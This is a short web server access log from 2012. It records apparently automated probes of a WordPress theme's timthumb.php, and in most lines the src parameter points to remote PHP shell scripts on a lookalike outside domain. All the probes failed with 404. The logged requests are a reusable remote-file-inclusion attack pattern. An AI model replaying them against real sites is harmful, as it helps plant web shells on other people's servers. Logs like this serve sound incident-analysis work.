89.33.197.242 - - [14/May/2012:04:59:33 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:59:34 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:59:34 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:59:34 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
